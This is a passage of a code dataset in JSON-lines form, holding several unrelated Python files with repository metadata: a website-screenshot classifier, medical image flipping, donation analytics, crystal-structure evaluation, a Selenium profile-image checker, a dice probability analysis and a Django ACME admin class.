utils.training import RecorderMeter, AverageMeter\n\nfrom 
config.config import WEBSITES_DATASET_PATH\n\nLABELS = [\"Homepage\", \"Login Page\", \"Not Found\", \"Old Looking\"]\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description='Eyeballer')\n parser.add_argument('--test-dir', type=str, required=True,\n help='Folder containing the images to test')\n parser.add_argument('--arch', default='vgg16', choices=['vgg16', 'vgg19','resnet18', 'resnet50', 'resnet101', 'resnet152'],\n help='Model architecture: (default: vgg16)')\n parser.add_argument('--seed', type=int, default=111,\n help='Seed used (default: 111)')\n parser.add_argument('--batch-size', type=int, default=32,\n help=\"Batch size (default: 32)\")\n parser.add_argument('--workers', type=int, default=6,\n help='Number of data loading workers (default: 6)')\n args = parser.parse_args()\n\n args.use_cuda = torch.cuda.is_available()\n\n return args\n\ndef main():\n args = parse_arguments()\n\n random.seed(args.seed)\n cudnn.benchmark = True\n\n model_path = get_model_path('websites', args.arch, args.seed)\n\n # Data specifications for the webistes dataset\n mean = [0., 0., 0.]\n std = [1., 1., 1.]\n input_size = 224\n num_classes = 4\n\n # Dataset\n test_transform = transforms.Compose([\n transforms.Resize(input_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n data_test = dset.ImageFolder(root=args.test_dir, transform=test_transform)\n\n # Dataloader\n data_test_loader = torch.utils.data.DataLoader(data_test,\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True)\n\n # Network\n if args.arch == \"vgg16\":\n net = models.vgg16(pretrained=True)\n elif args.arch == \"vgg19\":\n net = models.vgg19(pretrained=True)\n elif args.arch == \"resnet18\":\n net = models.resnet18(pretrained=True)\n elif args.arch == \"resnet50\":\n net = models.resnet50(pretrained=True)\n elif args.arch == \"resnet101\":\n net = models.resnet101(pretrained=True)\n elif args.arch == \"resnet152\":\n net = models.resnet152(pretrained=True)\n else:\n raise ValueError(\"Network {} not supported\".format(args.arch))\n\n if num_classes != 1000:\n net = manipulate_net_architecture(model_arch=args.arch, net=net, num_classes=num_classes)\n \n # Loading the checkpoint\n net.load_state_dict(torch.load(os.path.join(model_path, 'checkpoint.pth.tar'))['state_dict'])\n net.eval()\n\n # Cuda\n if args.use_cuda:\n net.cuda()\n\n for idx, (img, _) in enumerate(data_test_loader):\n if args.use_cuda:\n img = img.cuda()\n with torch.no_grad():\n pred = torch.argmax(net(img), dim=-1)\n \n samples = data_test.samples[idx*args.batch_size:(idx+1)*args.batch_size]\n for idx2, sample in enumerate(samples):\n label_idx = pred[idx2].cpu().detach().numpy()\n label = LABELS[label_idx]\n print(\"{} - {} - {}\".format(sample[0], label , label_idx))\n \nif __name__ == '__main__':\n main()\n", "repo_name": "phibenz/eyeballer.pytorch", "sub_path": "eyeballer.py", "file_name": "eyeballer.py", "file_ext": "py", "file_size_in_byte": 3853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", 
"line_number": 41, "usage_type": "name"}, {"api_name": "utils.utils.get_model_path", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 52, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 52, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 53, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 53, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 54, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 55, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 55, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 56, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torchvision.models.vgg16", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 67, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 69, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 71, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 71, "usage_type": "name"}, {"api_name": "torchvision.models.resnet50", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.resnet101", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.models.resnet152", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.utils.manipulate_net_architecture", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "28534813731", "text": "from PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n# method – One of PIL.Image.FLIP_LEFT_RIGHT, PIL.Image.FLIP_TOP_BOTTOM, PIL.Image.ROTATE_90, \r\n# PIL.Image.ROTATE_180, PIL.Image.ROTATE_270 or PIL.Image.TRANSPOSE.\r\nfor i in range(68,80):\r\n\tif os.path.exists(\"../raw data/lits/NII/volume/volume-{}.nii\".format(i)):\r\n\t\tprint('----------',i,'-----------') \r\n\t\tnumber_of_instance = len(os.listdir('../data/data/{}/gt/'.format(i)))\r\n\t\tfor idx in range(number_of_instance):\r\n\t\t\t# idx = 10\r\n\t\t\timage = Image.open('../data/data/{}/img/{}.png'.format(i,idx), mode='r')\r\n\t\t\timage = image.convert(\"L\")\r\n\t\t\tgt = Image.open('../data/data/{}/gt/{}.png'.format(i,idx), mode='r')\r\n\t\t\tgt = gt.convert(\"L\")\r\n\t\t\t# image = image.transpose(Image.FLIP_TOP_BOTTOM)\r\n\t\t\t# gt = gt.transpose(Image.FLIP_TOP_BOTTOM)\r\n\t\t\timage = 
image.transpose(Image.FLIP_LEFT_RIGHT)\r\n\t\t\tgt = gt.transpose(Image.FLIP_LEFT_RIGHT)\r\n\t\t\t# plt.imshow(np.array(image.getdata()).reshape((512,512)),cmap='gray')\r\n\t\t\t# plt.axis('off')\r\n\t\t\t# plt.show()\r\n\t\t\t# plt.imshow(np.array(gt.getdata()).reshape((512,512)),cmap='gray')\r\n\t\t\t# plt.axis('off')\r\n\t\t\t# plt.show()\r\n\t\t\timage.save('../data/data/{}/img/{}.png'.format(i,idx))\r\n\t\t\tgt.save('../data/data/{}/gt/{}.png'.format(i,idx))\r\n\t\t\r\n\r\n\r\n", "repo_name": "AnsenHuang14/3D-Medical-Image-Segmentation", "sub_path": "data processing/image_flip.py", "file_name": "image_flip.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 20, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "29219687732", "text": "import argparse\nimport os\nfrom donation_analytics_validations import *\nfrom donation_analytics_process import *\n\ndef main():\n # Parses command line arguments for the paths\n parser = argparse.ArgumentParser(description='Parses the path for the percentile file and the contributions file.')\n parser.add_argument('contributions_path')\n parser.add_argument('percentile_path')\n parser.add_argument('output_path')\n args = parser.parse_args()\n\n # If the repeat_donors.txt already exists, remove it first\n try:\n os.remove(args.output_path)\n except OSError:\n pass\n\n percentile = read_percentile(args.percentile_path)\n input_stream = read_data(args.contributions_path)\n\n donors = {}\n contributions = {}\n\n for line in input_stream:\n record = validate_record(line)\n\n if not record:\n continue\n\n record = check_repeat_donor(record, donors)\n\n if record:\n update_contributions(record, contributions)\n result = generate_result(record, contributions, percentile)\n write_output(args.output_path, result)\n\n input_stream.close()\n\nif __name__ == '__main__':\n main()", "repo_name": "victorou22/donation-analytics", "sub_path": "src/donation_analytics_driver.py", "file_name": "donation_analytics_driver.py", "file_ext": "py", "file_size_in_byte": 1177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "72367623846", "text": "import pickle\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport hydra\nimport numpy as np\nimport torch\nfrom torch_geometric.nn import nearest\n\nfrom mp_dataset import MPDatasetDataModule\nfrom utils import extract_lattice\n\nlogger = getLogger(__name__)\n\n\ndef evaluate_entry(\n true_data,\n pred_data,\n log_f=None,\n):\n 
true_pos = true_data.pos\n true_spec = true_data.x.flatten()\n true_length, true_angle = extract_lattice(true_data)\n\n pred_pos = pred_data.pos\n pred_spec = pred_data.x.flatten()\n pred_length, pred_angle = extract_lattice(pred_data)\n\n # compute distance error\n num_true_points = true_pos.shape[0]\n num_pred_points = pred_pos.shape[0]\n\n ext_true_pos = true_pos.view(1, num_true_points, 3).repeat(num_pred_points, 1, 1)\n ext_pred_pos = pred_pos.view(num_pred_points, 1, 3).repeat(1, num_true_points, 1)\n diff = ext_true_pos - ext_pred_pos\n dists = diff.pow(2).sum(dim=2)\n dists = dists.sqrt()\n # dists: (num_pred_points(detected), num_true_points(exist))\n\n if num_pred_points > 0:\n dists_exist, _ = dists.min(dim=0)\n else:\n dists_exist = torch.ones((num_true_points,), dtype=torch.float32) * np.inf\n\n if num_true_points > 0:\n dists_detected, _ = dists.min(dim=1)\n else:\n logger.warning(\"something wrong in dataset\")\n dists_detected = torch.ones((num_pred_points,), dtype=torch.float32) * np.inf\n\n position_error_exist = dists_exist\n position_error_detected = dists_detected\n\n num_atom_correct = true_pos.shape[0] == pred_pos.shape[0]\n\n # compute spec error\n\n if num_pred_points > 0:\n nearest_idx = nearest(pred_pos, true_pos)\n compare_true_spec = true_spec[nearest_idx]\n\n nearest_idx = nearest(true_pos, pred_pos)\n compare_pred_spec = pred_spec[nearest_idx]\n else:\n compare_true_spec = torch.ones(pred_spec.shape, dtype=torch.int64) * -1\n compare_pred_spec = torch.ones(true_spec.shape, dtype=torch.int64) * -1\n\n species_correct_detected = compare_true_spec == pred_spec\n species_correct_exist = true_spec == compare_pred_spec\n\n length_error = torch.abs(true_length - pred_length).flatten()\n angle_error = torch.abs(true_angle - pred_angle).flatten() * 180 / np.pi\n\n retval = {\n \"num_atom_correct\": num_atom_correct,\n \"position_error_exist\": position_error_exist,\n \"position_error_detected\": position_error_detected,\n \"species_correct_exist\": species_correct_exist,\n \"species_correct_detected\": species_correct_detected,\n \"length_error\": length_error,\n \"angle_error\": angle_error,\n }\n\n if log_f is not None:\n # write log\n log_f.write(f\"num_atom_exist: {num_true_points}\\n\")\n log_f.write(f\"num_atom_detected: {num_pred_points}\\n\")\n log_f.write(f\"num_atom_correct: {num_atom_correct}\\n\")\n\n position_error_exist = float(position_error_exist.mean())\n position_error_detected = float(position_error_detected.mean())\n species_correct_exist = float(species_correct_exist.float().mean())\n species_correct_detected = float(species_correct_detected.float().mean())\n\n length_error = \", \".join(f\"{x.item():.4f}\" for x in length_error)\n angle_error = \", \".join(f\"{x.item():.4f}\" for x in angle_error)\n\n log_f.write(f\"position_error_exist: {position_error_exist:.4f}\\n\")\n log_f.write(f\"position_error_detected: {position_error_detected:.4f}\\n\")\n log_f.write(f\"species_correct_exist: {species_correct_exist*100:.4f}\\n\")\n log_f.write(f\"species_correct_detected: {species_correct_detected*100:.4f}\\n\")\n log_f.write(f\"length_error: {length_error}\\n\")\n log_f.write(f\"angle_error: {angle_error}\\n\")\n log_f.write(\"\\n\")\n\n return retval\n\n\ndef evaluate_dataset(dataset, reconstructed, split, log_f=None):\n num_atom_correct_list = []\n position_error_exist_list = []\n position_error_detected_list = []\n species_correct_exist_list = []\n species_correct_detected_list = []\n lattice_length_error_list = []\n lattice_angle_error_list = 
[]\n\n for true_data in dataset:\n mpid = true_data[\"mpid\"]\n pred_data = reconstructed[mpid]\n\n if log_f is not None:\n log_f.write(f\"{mpid} (in {split})\\n\")\n\n retval = evaluate_entry(true_data, pred_data, log_f=log_f)\n\n num_atom_correct_list.append(retval[\"num_atom_correct\"])\n position_error_exist_list.append(retval[\"position_error_exist\"])\n position_error_detected_list.append(retval[\"position_error_detected\"])\n species_correct_exist_list.append(retval[\"species_correct_exist\"])\n species_correct_detected_list.append(retval[\"species_correct_detected\"])\n lattice_length_error_list.append(retval[\"length_error\"])\n lattice_angle_error_list.append(retval[\"angle_error\"])\n\n # write summary\n num_atom_correct = sum(num_atom_correct_list)\n num_atom_correct_ratio = num_atom_correct / len(dataset)\n\n position_error_exist = torch.cat(position_error_exist_list)\n position_error_exist = float(position_error_exist.mean())\n\n position_error_detected = torch.cat(position_error_detected_list)\n position_error_detected = float(position_error_detected.mean())\n\n species_correct_exist = torch.cat(species_correct_exist_list)\n species_correct_exist = float(species_correct_exist.float().mean())\n\n species_correct_detected = torch.cat(species_correct_detected_list)\n species_correct_detected = float(species_correct_detected.float().mean())\n\n length_error = torch.cat(lattice_length_error_list)\n length_error = float(length_error.mean())\n\n angle_error = torch.cat(lattice_angle_error_list)\n angle_error = float(angle_error.mean())\n\n summary_text = f\"\"\"Summary (in {split})\nnum_atom_correct_ratio: {num_atom_correct_ratio:.4f}\nposition_error_exist: {position_error_exist:.4f}\nposition_error_detected: {position_error_detected:.4f}\nspecies_correct_exist: {species_correct_exist*100:.4f}\nspecies_correct_detected: {species_correct_detected*100:.4f}\nlength_error: {length_error:.4f}\nangle_error: {angle_error:.4f}\n\"\"\"\n logger.info(summary_text)\n log_f.write(summary_text)\n\n return {\n \"num_atom_correct_ratio\": num_atom_correct_ratio,\n \"position_error_exist\": position_error_exist,\n \"position_error_detected\": position_error_detected,\n \"species_correct_exist\": species_correct_exist,\n \"species_correct_detected\": species_correct_detected,\n \"length_error\": length_error,\n \"angle_error\": angle_error,\n }\n\n\ndef evaluate_splits(\n data_module, reconstructed_data, splits, log_dir=None, postfix=\"trained\"\n):\n logger.info(f\"Dataset: {data_module.dataset_name}\")\n\n datasets = {\n \"train\": data_module.train_dataset,\n \"validation\": data_module.validation_dataset,\n \"test\": data_module.test_dataset,\n }\n\n logger.info(f\"Train dataset size: {len(datasets['train'])}\")\n logger.info(f\"Validation dataset size: {len(datasets['validation'])}\")\n logger.info(f\"Test dataset size: {len(datasets['test'])}\")\n\n result = dict()\n\n # evaluate\n for split in splits:\n assert split in datasets.keys()\n logger.info(f\"Split: {split}\")\n\n # get dataset\n dataset = datasets[split]\n logger.info(f\"Dataset size: {len(dataset)}\")\n\n # get reconstructed data\n reconstructed = reconstructed_data[split]\n logger.info(f\"Reconstructed data size: {len(reconstructed)}\")\n\n # check all data is reconstructed\n reconstructed_mpids = set(reconstructed.keys())\n assert len(dataset) == len(reconstructed)\n assert all(data[\"mpid\"] in reconstructed_mpids for data in dataset)\n\n # evaluate\n if log_dir is None:\n log_f = None\n else:\n log_dir.mkdir(parents=True, 
exist_ok=True)\n log_f = open(\n log_dir / f\"{data_module.dataset_name}_{split}_{postfix}.log\", mode=\"w\"\n )\n\n retval = evaluate_dataset(dataset, reconstructed, split, log_f=log_f)\n\n if log_f is not None:\n log_f.close()\n\n result[split] = retval\n\n # write summary\n return result\n\n\n@hydra.main(version_base=None, config_name=\"config\", config_path=\"./config\")\ndef main(config):\n log_dir = Path(config[\"evaluate\"][\"log_dir\"])\n log_dir.mkdir(parents=True, exist_ok=True)\n\n reconstructed_dir = Path(config[\"reconstruction\"][\"output_dir\"])\n\n # prepare dataset\n data_module = MPDatasetDataModule(**config[\"dataset\"], **config[\"data_module\"])\n\n # set reconstruction mode: trained or ground_truth\n mode = config[\"reconstruction\"].get(\"mode\", \"trained\")\n assert mode in [\"trained\", \"ground_truth\"]\n\n if mode == \"trained\":\n reconstructed_path = reconstructed_dir / f\"{data_module.dataset_name}.pkl\"\n elif mode == \"ground_truth\":\n reconstructed_path = (\n reconstructed_dir / f\"{data_module.dataset_name}_ground_truth.pkl\"\n )\n else:\n raise ValueError(f\"Invalid mode: {mode}\")\n\n # load reconstructed data\n with open(reconstructed_path, mode=\"rb\") as f:\n reconstructed_data = pickle.load(f)\n splits = reconstructed_data.keys()\n\n # evaluate\n results = evaluate_splits(\n data_module,\n reconstructed_data,\n splits,\n log_dir=log_dir,\n postfix=mode,\n )\n\n with open(log_dir / \"metrics.csv\", mode=\"a\") as f:\n for split, result in results.items():\n for k, v in result.items():\n f.write(f\"{data_module.dataset_name},{split},{k},{v}\\n\")\n logger.info(\"Done\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "omron-sinicx/neural-structure-field", "sub_path": "src/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 9680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.extract_lattice", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.extract_lattice", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.nearest", "line_number": 59, "usage_type": "call"}, {"api_name": "torch_geometric.nn.nearest", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.abs", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 148, 
"usage_type": "call"}, {"api_name": "torch.cat", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 154, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 237, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 240, "usage_type": "call"}, {"api_name": "mp_dataset.MPDatasetDataModule", "line_number": 243, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 260, "usage_type": "call"}, {"api_name": "hydra.main", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "12520713980", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import *\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\n# chrome_options=Options()\n# chrome_options.add_argument(\"--headless\")\n# driver=webdriver.Chrome(options=chrome_options)\ndriver=webdriver.Firefox()\naction=ActionChains(driver)\ndriver.maximize_window()\ndriver.get(\"https://referloan.in\")\ndriver.implicitly_wait(10)\ntime.sleep(1)\nno_profile=open(\"No-Profile.txt\",'w')\ntry:\n for b in range(1,500):\n check=driver.find_element(By.XPATH,\"(//ul/li/a[@tabindex='-1'])[%d]\"%(b))\n check_text = driver.find_element(By.XPATH, \"(//ul/li/a[@tabindex='-1'])[%d]\" % (b)).text\n check_last=driver.find_element(By.XPATH,\"(//ul/li/a[@tabindex='-1'])[last()]\").text\n check_url=check.get_attribute('href')\n time.sleep(0.2)\n driver.get(check_url)\n driver.implicitly_wait(10)\n time.sleep(0.5)\n check_profile=driver.find_element(By.XPATH,\"//div[@class='CardImg_box']\").size\n if (check_profile[\"height\"]==214) and (check_profile[\"width\"]==340):\n continue\n else:\n driver.refresh()\n driver.implicitly_wait(10)\n time.sleep(0.5)\n check_profile = driver.find_element(By.XPATH, \"//div[@class='CardImg_box']\").size\n if (check_profile[\"height\"] == 214) and (check_profile[\"width\"] == 340):\n continue\n else:\n print(\"Profile Not Found in\",driver.find_element(By.XPATH, \"//span[contains(@style,'text-transform')]\").text)\n no_profile.write(\"Profile Not Found in \" + driver.find_element(By.XPATH,\"//span[contains(@style,'text-transform')]\").text)\n no_profile.write(\"\\n\")\nexcept:\n time.sleep(3)\n driver.close()\n", "repo_name": "pushkar718/Selenium-projects", "sub_path": "check-image/check-profile.py", "file_name": "check-profile.py", "file_ext": "py", "file_size_in_byte": 1844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 11, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 19, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 19, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, 
{"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 27, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 27, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "9019832215", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('C:\\\\Users\\\\win10\\\\Desktop\\\\num.txt', encoding = 'cp860')\nunique, counts = np.unique(data, return_counts = True)\nprint(unique, counts)\nplt.hist(data);\n\nnum_sixes = (data == 6).sum()\nnum_total = data.size\nnum_sixes\nnum_total\n\nfrom scipy.stats import binom\nn = np.arange(num_total)\nprob_n = binom.pmf(n, num_total, 1/6)\nplt.plot(n, prob_n, label='Prob num')\nplt.axvline(num_total / 6, ls ='--', lw=1, label=\"Mean num\")\nplt.axvline(num_sixes, ls=\":\", color = \"#ff7272\", label = \"Obs num\")\nplt.xlabel(f\"Num sixes rolled out of {num_total} rolls\")\nplt.ylabel(\"Probability\")\nplt.legend();\nprint(f\"Num sixes rolled out of {num_total} rolls\")\n\nd = binom(num_total, 1/6)\nplt.plot(n, d.sf(n))\nplt.axvline(num_sixes, ls=\"--\")\nsf = d.sf(num_sixes)\nplt.xlabel(\"Num sixes\")\nplt.ylabel(\"SF\")\nprint(f\" Only {sf * 100:.1f}% of the time with a fair dice you'd roll thie many or more sixes.\")\n\n\n", "repo_name": "jhaneto/jhan", "sub_path": "Curso_Formcao_DS/exemplo1.py", "file_name": "exemplo1.py", "file_ext": "py", "file_size_in_byte": 946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.loadtxt", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.stats.binom.pmf", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.stats.binom", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.stats.binom", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "16271157526", "text": "from django.contrib import admin\nfrom django.utils.html import format_html\nfrom django.urls import reverse, NoReverseMatch\nfrom .models import AcmeChallenge\n\n\nclass AcmeChallengeAdmin(admin.ModelAdmin):\n def format_acme_url(self, acme_object):\n try:\n object_url = reverse(viewname='acmechallenge-response', args=(acme_object.challenge, ))\n return format_html(\"ACME Challenge Link\", object_url)\n except NoReverseMatch:\n return '-'\n format_acme_url.short_description = 'Link'\n\n fieldsets = [\n ('ACME Request', {\n 'fields': [\n 'challenge',\n 'response',\n ],\n }),\n ('Metadata', {\n 'fields': [\n 'id',\n 'format_acme_url',\n ],\n }),\n ]\n\n list_display = ['challenge', 'format_acme_url']\n ordering = ['challenge']\n readonly_fields = ['id', 'format_acme_url']\n search_fields = ['challenge', 'response']\n\n\nadmin.site.register(AcmeChallenge, AcmeChallengeAdmin)\n", "repo_name": "lukehuang/certbot-django", "sub_path": "src/certbot_django/server/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.html.format_html", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.NoReverseMatch", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 37, "usage_type": "call"}, {"api_name": "models.AcmeChallenge", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "5884233634", "text": "from sys import version_info\nif version_info.major >= 3: import tkinter as tk\nelse: import Tkinter as tk\n\nfrom lib.hotkeys import Hotkeys\nfrom hotkeyslist import hotkeyslist\nfrom functions.hotkeystostring import hotkeys_to_string\n\nclass Menu(tk.Menu, object):\n def 